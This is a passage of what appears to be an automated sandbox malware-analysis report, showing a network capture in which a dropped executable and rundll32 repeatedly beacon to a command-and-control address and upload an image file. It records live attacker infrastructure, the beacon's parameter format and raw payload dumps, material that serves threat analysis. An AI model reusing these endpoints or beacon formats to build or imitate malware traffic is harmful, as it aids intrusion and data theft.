                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 22:59:45.025192976 CEST6481OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 22:59:45.025248051 CEST6484OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 22:59:45.025820971 CEST6486OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 22:59:45.025939941 CEST6489OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 22:59:45.026151896 CEST6492OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 22:59:45.026321888 CEST6494OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 22:59:45.026340961 CEST6497OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 22:59:45.026511908 CEST6500OUTData Raw: 71 ff 00 09 d7 8d cf fd c9 13 7f f1 75 fc de 78 6b e1 1f c5 8f 18 fc 4d 1f 05 3c 1f f0 ab c4 9a af 8c cd fc f6 23 c2 3a 66 85 71 3e a8 6e a1 df e7 41 f6 44 43 37 98 9b 1f 72 6d dc bb 1b 20 60 d7 5f a0 7e c4 3f b6 af 8c 3c 6b af 7c 33 f0 97 ec 75
                                                                                                                                          Data Ascii: quxkM<#:fq>nADC7rm `_~?<k|3u[T'~?:?j 2[F@/`1UZ-jCcq:n!}uz7r~o:3>6x?823_:[oAIzm"I4bCE
                                                                                                                                          Apr 28, 2021 22:59:45.026787996 CEST6503OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 22:59:45.027004957 CEST6505OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          216176.111.174.11480192.168.2.449874C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:45.005768061 CEST6478INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:44 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          217192.168.2.449876176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:45.219613075 CEST6665OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          218176.111.174.11480192.168.2.449876C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:45.318110943 CEST6693INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:45 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          219176.111.174.11480192.168.2.449875C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:45.410231113 CEST6694INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:45 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          22192.168.2.449759176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:12.749295950 CEST4532OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          220192.168.2.449877176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:45.539273024 CEST6695OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          221176.111.174.11480192.168.2.449877C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:45.642859936 CEST6696INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:45 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          222192.168.2.449879176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:45.848769903 CEST6696OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          223176.111.174.11480192.168.2.449879C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:45.952708006 CEST6697INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:45 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          224192.168.2.449880176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:46.161587000 CEST6697OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          225176.111.174.11480192.168.2.449880C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:46.265474081 CEST6698INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:46 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          226192.168.2.449881176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:46.476012945 CEST6698OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          227176.111.174.11480192.168.2.449881C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:46.580061913 CEST6699INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:46 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          228192.168.2.449882176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:46.795537949 CEST6699OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          229176.111.174.11480192.168.2.449882C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:46.897949934 CEST6700INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:46 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          23176.111.174.11480192.168.2.449759C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:12.852711916 CEST4532INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:12 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          230192.168.2.449884176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:47.118421078 CEST6700OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
